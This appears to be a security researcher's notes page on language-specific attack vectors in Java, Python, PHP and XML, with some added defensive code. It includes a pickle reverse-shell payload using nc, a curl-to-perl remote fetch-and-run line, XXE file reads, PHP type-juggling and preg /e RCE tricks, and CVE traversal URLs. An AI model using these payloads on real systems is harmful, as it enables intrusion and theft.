
Languages

Esoteric Languages

.Net

C / C++

  • Unsafe functions
    • strcpy
    • strcat

GO

Environment Setup

References

Java

  • Decompiler: https://github.com/skylot/jadx
  • Simple steps to create Jar
    javac -source 1.8 -target 1.8 test.java
    mkdir META-INF
    echo "Main-Class: test" > META-INF/MANIFEST.MF
    jar cmvf META-INF/MANIFEST.MF test.jar test.class
    java -jar test.jar
    
  • Debug
    -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8787,server=y,suspend=n  # JDWP agent on 8787; pre-JDK 9 this binds all interfaces, JDK 9+ defaults to localhost
    jdb -attach example:8787
    jdb -sourcepath . -attach example:8787 # jdb with the sourcepath
    stop in <full package>.<class>.<method>
    list
    
    # add to tomcat-version/bin/startup.sh
    export JPDA_ADDRESS=8000
    export JPDA_TRANSPORT=dt_socket
    
    # modify last line to
    exec "$PRGDIR"/"$EXECUTABLE" jpda start "$@"
    

Deserialization

References

New Technologies

JavaScript

Tools

NodeJS / JavaScript

  • Look for eval()

Tools

References

Rails

RegEx

References

Rust

References

Python

SSTI

  • Searching:
    c = 'HELLO'.__class__.__base__.__subclasses__()  # every class derived from object
    
    for i in range(len(c)):
      print( i, c[i].__name__ )
    
    for i in range(len(c)):
      n = c[i].__name__
      if n.find('warning') > -1: # Find a specific class name
        print( i, n )
    

Challenges

Tools

  • ZipApps - similar to JAR
  • pipX - pip with virtual env
  • Shiv - Modified ZipApp to work with C extensions
  • Packaging: The bible of packaging python apps in docker

Attack Vectors

  • Exploiting Imports: it is possible to create a .py file named after the import. This loads the local file (same dir as the file importing the library) instead of the actual library.
  • cPickle RCE
    • Arbitrary code execution with Python pickles
    • Python Pickle Injection
    • https://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/
    • https://blog.nelhage.com/2011/03/exploiting-pickle/
    • https://stackoverflow.com/questions/38307636/can-anyone-explain-me-the-example-of-an-exploit-in-python-s-pickle-module
    • HTB - DevOps
    • HTB - Challenge - Mics - Long Bottom's Locker
    • https://www.hackingnote.com/en/python-challenge-solutions/level-5
    • Pickle formats: http://spootnik.org/entries/2014/04/05/diving-into-the-python-pickle-formatt/index.html

#!/usr/bin/python3
import sys
import pickle

# Loads a pickled banner (a list of rows, each a list of (char, count) pairs) and renders it.
# pickle.load() runs whatever the stream tells it to, so only feed it files you trust.
with open(sys.argv[1], 'rb') as f:
    mydict = pickle.load(f)

for line in mydict:
    print("".join([k * v for k, v in line]))

# Same rendering written with an explicit inner loop
for i in mydict:
    b = []
    for x in i:
        b.append(x[0] * x[1])

    print("".join(b))
Pickle RCE via __reduce__ (HTB - DevOps, Python 2):

import cPickle, requests, base64

LHOST = '10.10.14.14'
LPORT = '31337'
RHOST = '10.10.10.91'
RPORT = '5000'


class Payload(object):
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        # pickle records (callable, args); the loader calls os.system(cmd) to "rebuild" the object
        import os
        return (os.system, (self.cmd,))


reverse_sh = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f" % (LHOST, LPORT)
evilpickle = cPickle.dumps(Payload(reverse_sh))

r = requests.post('http://%s:%s/newpost' % (RHOST, RPORT), data=base64.urlsafe_b64encode(evilpickle))
print('POST {} {}'.format(r.status_code, r.url))

Pickle to object:

import pickle
import base64
pickled = base64.b64decode("Value")  # "Value" is the base64 blob to inspect
pickle.loads(pickled)                # loads() for bytes; this executes any __reduce__ callable in the stream
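The counterpart to the payload above, as an added example that is not code from the notes or the linked write-ups: the RestrictedUnpickler pattern from the Python documentation, plus a static opcode scan that flags pickles importing globals without executing them. The Probe class, the allow-list and the sample banner are constructed for the example.

```python
import io
import pickle
import pickletools

# Globals that may be resolved while unpickling; everything else is refused.
# Plain containers, str, bytes and numbers never need find_class at all.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves the globals listed in ALLOWED_GLOBALS."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def references_globals(data: bytes) -> bool:
    """Static check: does the stream import any global (the opcodes a
    __reduce__-based payload needs)? Never executes the pickle."""
    return any(op.name in ("GLOBAL", "STACK_GLOBAL", "INST", "OBJ")
               for op, _arg, _pos in pickletools.genops(data))

class Probe:
    """Hypothetical stand-in for the Payload class above: __reduce__ names a
    callable (the harmless os.getcwd) that a plain pickle.loads() would invoke."""
    def __reduce__(self):
        import os
        return (os.getcwd, ())

def load_outcome(data: bytes):
    """Return ('ok', obj) or ('rejected', reason)."""
    try:
        return ("ok", restricted_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))

# Constructed samples: a banner in the challenge's (char, count) format, and a probe payload
BANNER = pickle.dumps([[("#", 3), (" ", 2), ("#", 3)], [("#", 8)]])
PROBE = pickle.dumps(Probe())

if __name__ == "__main__":
    print(references_globals(BANNER), load_outcome(BANNER))
    print(references_globals(PROBE), load_outcome(PROBE))
```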

PHP

  • Extensions: .php .php3 .php4 .php5 .php7 .phps .phtml .inc .phar

Cheatsheets

References

Attack Vectors

Terminate strings using null byte

Before PHP 5.3, terminating strings with a null byte is possible (%00 in the URL)

http://example.com?param=../../../../etc/passwd
  -> /etc/passwd.php
http://example.com?param=../../../../etc/passwd%00
  -> /etc/passwd

Vulnerable Functions

Local / Remote file inclusion bugs:

include()
include_once()
require()
require_once()

Local / Remote command execution bugs:

eval()
preg_replace()
fwrite()
passthru()
file_get_contents()
shell_exec()
system()

SQL Injection bugs:

mysql_query()

File / File system bugs:

fopen()
readfile()
glob()
file()
popen()
exec()

https://0xzoidberg.wordpress.com/2010/05/26/vulnerable-php-functions/

RCE with PREG Functions

  • The preg_ functions (preg_match, preg_replace) implement PCRE regular expressions
  • The /e modifier makes preg_replace evaluate the replacement string as PHP code

Example:

<?php
$string = "this is my lower string";
print preg_replace('/(.*)/e', 'strtoupper("\\1")', $string);
?>

// THIS IS MY LOWER STRING

Example Attack:

<?php
$string = "phpinfo()";
print preg_replace('/^(.*)/e', 'strtoupper(\\1)', $string);
?>

Filter Evasion:

  • The filter blocks single quotes and escape characters

Following will fail: $string = "system('ls -lah')";

Bypass: $string = "`ls -lah`";

LFI with Filter Inclusion

LFI with Zip Inclusion (Include a file inside a zip)

LFI to RFI

  • Possible if allow_url_include is on

Type Juggling

Fixed in v7 (except for exponent)

References:


'0e1234' == '0e4321'
'0e1234' == '0'
'0e1234' <= '1'
'0xf' == '15' #0xf in hexadecimal notation is 15
'000...000' == int(0)
'0e0...000' == int(0)
'1e0...000' == int(1)
'0abc...000' == int(0)
'abc...000' == int(0) # a string starting with a non-numeric character is cast to int(0)
var_dump("2 bottles" == 2); // ==> TRUE

$values = array("apple","orange","pear","grape"); in_array(0, $values); // ==> TRUE

if($password == "secretpass") // ==> TRUE when $password=0

Example:

<?php
  $token = "0e124656823434657657655654324342";
  if(isset($_COOKIE['token']) && $_COOKIE['token'] == $token) {
    // access to privileged area
  }
  else {
    // login required
  }
?>

$_COOKIE['token'] == $token ('0e124656823434657657655654324342' == '0') will return TRUE
$_COOKIE['token'] != $token ('0e124656823434657657655654324342' != '0') will return FALSE
var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2'         == '1e3');
var_dump('0x1234Ab'       == '1193131');
var_dump('0xABCdef'       == '     0xABCdef');

MD5:
var_dump(md5('240610708') == md5('QNKCDZO'));
// 0e462097431906509019562988736854 == 0e830400451993494058024219903391

SHA1:
// 0e07766915004133176347055865026311692244

import hashlib
import itertools
import re
import string

def find_email_with_juggle_md5(domain, max_prefix_length, hash_split_length):
    # Enumerate lowercase local parts of the given length and report addresses whose
    # md5 (optionally truncated) has the form 0e<digits>, i.e. a "magic hash" under PHP ==
    count = 0
    for check in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(max_prefix_length))):
        hash = hashlib.md5(("%s@%s" % (check, domain)).encode()).hexdigest()
        if hash_split_length > 0:
            hash = hash[:hash_split_length]
        if re.match(r'0+[eE]\d+$', hash):
            print("(+) Found %s@%s, with %d attempts (hash: %s)" % (check, domain, count, hash))
        count += 1  # inside the loop, so the attempt counter actually counts

Reduction in Entropy (Insecure HMAC)

$secret = 'secure_random_secret_value';
$hmac = md5($secret . $_POST['message']);
if($hmac == $_POST['hmac'])
    // ===> Bypass by creating a hmac starting with `0e[0-9]`
    // var_dump("0e123" == "0e51217526859264863"); ===> TRUE
    shell_exec($_POST['message']);

Hashing Algorithm Disclosure

Given 240610708 and QNKCDZO, an attacker can guess that the hashing algorithm is md5

var_dump(md5('240610708') == md5('QNKCDZO')); ===> TRUE
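To make the comparisons above checkable outside PHP, here is an added example (not from the notes) that models PHP 7's loose `==` for strings and ints, computes the md5 magic hashes with hashlib, and contrasts the vulnerable `$hmac == $_POST['hmac']` check with a constant-time, type-safe comparison (hash_equals in PHP, hmac.compare_digest here). The model is a simplification: decimal numeric strings with exponents only, no hex.

```python
import hashlib
import hmac
import re

# PHP 7 numeric-string grammar (simplified): optional leading whitespace, decimal
# digits, optional fraction and exponent. Hex strings stopped being numeric in PHP 7.
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
LEADING_INT = re.compile(r"^\s*[+-]?\d+")

def php_loose_eq(a, b) -> bool:
    """Model of PHP 7's == for str/int operands (pre-PHP 8 rules).
    Two numeric strings compare as numbers, so every '0e<digits>' hash is 0.0;
    a string compared with an int is cast via its leading digits, else to 0."""
    if isinstance(a, str) and isinstance(b, str):
        if NUMERIC.match(a) and NUMERIC.match(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, int) and isinstance(b, str):
        a, b = b, a
    if isinstance(a, str) and isinstance(b, int):
        m = LEADING_INT.match(a)
        return (int(m.group()) if m else 0) == b
    return a == b

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def loose_hmac_check(stored: str, supplied: str) -> bool:
    """The vulnerable comparison from the snippet above: $hmac == $_POST['hmac']."""
    return php_loose_eq(stored, supplied)

def strict_hmac_check(stored: str, supplied: str) -> bool:
    """The fix: hash_equals() in PHP, hmac.compare_digest() here; byte-wise,
    constant-time, and with no numeric coercion."""
    return hmac.compare_digest(stored.encode(), supplied.encode())

if __name__ == "__main__":
    h1, h2 = md5_hex("240610708"), md5_hex("QNKCDZO")
    print(h1, h2, php_loose_eq(h1, h2))
    print(php_loose_eq("2 bottles", 2), php_loose_eq(0, "secretpass"), php_loose_eq(0, "apple"))
    print(loose_hmac_check(h1, "0e1"), strict_hmac_check(h1, "0e1"))
```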

XML

  • Internal entity: <!ENTITY name "entity_value">
    • <!ENTITY test "<value>test</value>">
      <?xml version="1.0"?>
      <!DOCTYPE data [
      <!ELEMENT data ANY >
      <!ENTITY name "Replaced">
      ]>
      <root>
          <t1>&name;</t1>
      </root>
      
  • External entity:
    • Private: <!ENTITY name SYSTEM "URI">
      • <!ENTITY example SYSTEM "http://example.com/example.xml">
    • Public: <!ENTITY name PUBLIC "public_id" "URI">
      • <!ENTITY example PUBLIC "-//W3C//TEXT examples//EN" "http://example.com/example.xml">
        <?xml version="1.0"?>
        <!DOCTYPE data [
        <!ELEMENT data ANY >
        <!ENTITY name SYSTEM "file:///etc/passwd">
        ]>
        <root>
            <t1>&name;</t1>
        </root>
        
  • Parameter Entity: <!ENTITY % name SYSTEM "URI">
    • <!ENTITY % test 'Example'> <!ENTITY Title 'This is %test;'>
  • Unparsed:
    • <!ENTITY name SYSTEM "URI" NDATA TYPE>
    • <!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>
  • CDATA
    • It's not possible to reference a parameter entity inside another entity's value within the internal DTD that defines them
    • Hence an external DTD is needed: echo '<!ENTITY wrapper "%start;%content;%end;">' > wrapper.dtd
      <?xml version="1.0"?>
      <!DOCTYPE data [
      <!ENTITY % start "<![CDATA[">
      <!ENTITY % content SYSTEM "file:///example/example.xml" >
      <!ENTITY % end "]]>">
      <!ENTITY % dtd SYSTEM "http://example/wrapper.dtd" >
      %dtd;
      ]>
      <root>
          <t1>&wrapper;</t1>
      </root>
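The defensive side of the entity types above, as an added example that is not from the notes: an expat-based loader that lets the internal entity sample expand as normal but refuses the external SYSTEM and parameter entity declarations before any file or URL is touched. The three documents are constructed from the page's samples.

```python
import xml.parsers.expat as expat

# Constructed inputs modelled on the samples above: internal entity, external SYSTEM entity, remote DTD
INTERNAL_ONLY = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY name "Replaced">
]>
<root><t1>&name;</t1></root>"""
EXTERNAL_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<root><t1>&name;</t1></root>"""
PARAMETER_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://example/wrapper.dtd" >
%dtd;
]>
<root><t1>x</t1></root>"""

class ForbiddenEntity(ValueError):
    """Raised when a document declares an external or parameter entity."""

def text_content(data: bytes) -> str:
    """Parse with expat and return the character data. Internal entities expand as
    usual; a declaration that could read a file or fetch a URL aborts the parse."""
    parser = expat.ParserCreate()
    # Never expand parameter entities such as %dtd; (expat's default, made explicit)
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    chunks = []

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # value is None for SYSTEM/PUBLIC entities; parameter entities are DTD plumbing
        if is_param or value is None:
            raise ForbiddenEntity(f"refusing entity {name!r} (system id {system_id!r})")

    def external_ref(context, base, system_id, public_id):
        raise ForbiddenEntity(f"refusing external reference {system_id!r}")

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)  # exceptions raised inside handlers propagate from here
    return "".join(chunks)

def is_rejected(data: bytes) -> bool:
    try:
        text_content(data)
        return False
    except ForbiddenEntity:
        return True
```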
      

Breaking Parsers

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • new URL("file:///etc/passwd?/../../Windows/win.ini")
    • Windows: UNC: //etc/passwd?/../../Windows/win.ini
    • Linux: URL: file:///etc/passwd
  • replace vs. replaceAll
  • ..\Q/\E is the new ../ in Grails
  • /app/static/ vs. /app/static
    • Nginx:
    • location /static { alias /home/app/static/; }
    • In: http://127.0.0.1/static../settings.py
    • Out: /home/app/static/../settings.py
      200 http://target/assets/app.js
      403 http://target/assets/
      404 http://target/assets/../settings.py
      403 http://target/assets../
      200 http://target/assets../static/app.js
      200 http://target/assets../settings.py
      
  • Spring 0day - CVE-2018-1271
    • http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini
  • Spark framework CVE-2018-9159
    • Same as Spring
  • Rails 0day - CVE-2018-3760
    • Affected Rails under development environment
    • Or production mode with flag assets.compile on
    • Vuln
      • Sprockets supports file:// scheme that bypassed absolute_path?
      • URL decode bypassed double slashes normalization
      • Method split_file_uri resolved URI and unescape again
      • Lead to double encoding and bypass forbidden_request? and prefix check
    • http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/etc/passwd
    • RCE:
      • Inject query string %3F to File URL
      • Render as ERB template if the extension is .erb
      • http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/tmp/evil.erb%3ftype=text/plain
  • URL path parameter
    • Applies when a reverse proxy fronts a Java backend service
    • http://example.com/foo;name=orange/bar/
    • Bypass whitelist and blacklist ACL
    • Escape from context mapping
    • http://example.com/portal/..;/manager/html
      • Tomcat thinks it should look at parent directory
    • Example:
      • Uber disallows direct access to *.uberinternal.com
      • Whitelisted API: https://jira.uberinternal.com/status
      • Attack: https://jira.uberinternal.com/status/..;/secure/Dashboard.jspa
        • Nginx: /..;/ seems to be a directory with the /status whitelist. Pass to you!
        • Tomcat: /..;/ is the parent directory
    • Inconsistency to ACL bypass
      • Changing the 404 template file to
        • /railo-context/../logs/exception.log
      • curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"'
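To make the `/static` vs `/static/` alias case above checkable, here is an added model (not from the slides or these notes) of nginx's prefix location plus alias mapping. The paths mirror the slide; nginx behaviour is simplified to dot-segment normalization of the request URI followed by verbatim prefix substitution, which is enough to reproduce the 200 / 404 / traversal outcomes listed.

```python
import posixpath
from typing import Optional, Tuple

# Constructed config mirroring the slide: `location /static { alias /home/app/static/; }`
LOCATION_NO_SLASH = ("/static", "/home/app/static/")
LOCATION_SLASH = ("/static/", "/home/app/static/")  # the corrected form

def normalize_uri(uri: str) -> str:
    """nginx resolves dot segments and merges slashes before matching locations,
    which is why /static/../settings.py never reaches the alias but /static../ does."""
    return posixpath.normpath(uri)

def alias_map(uri: str, location: Tuple[str, str]) -> Optional[str]:
    """Prefix location + alias: the matched prefix is cut off and the remainder of
    the URI is appended to the alias verbatim, with no further normalization."""
    prefix, alias = location
    if not uri.startswith(prefix):
        return None
    return alias + uri[len(prefix):]

def escapes_root(mapped: str, root: str = "/home/app/static/") -> bool:
    """Does the mapped filesystem path resolve outside the alias directory?"""
    resolved = posixpath.normpath(mapped)
    root = posixpath.normpath(root)
    return not (resolved == root or resolved.startswith(root + "/"))

def audit(uri: str, location: Tuple[str, str]) -> str:
    """Classify one request against one location: unmatched, inside or traversal."""
    mapped = alias_map(normalize_uri(uri), location)
    if mapped is None:
        return "unmatched"
    return "traversal" if escapes_root(mapped) else "inside"

if __name__ == "__main__":
    for uri in ("/static/app.js", "/static/../settings.py", "/static../settings.py"):
        print(f"{uri:28} {audit(uri, LOCATION_NO_SLASH):10} {audit(uri, LOCATION_SLASH)}")
```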